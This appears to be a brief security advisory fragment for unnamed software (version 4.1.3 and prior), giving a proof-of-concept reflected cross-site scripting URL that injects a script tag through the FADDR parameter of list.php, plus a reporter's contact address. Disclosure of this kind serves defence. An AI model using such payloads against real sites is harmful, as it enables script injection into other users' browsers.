Version: 4.1.3 and prior ----------------------------- Proof of Concept ---------------- http://[host]/[path]/list.php?FADDR="><script>alert("XSS");</script> katatafish (at) hush (dot) com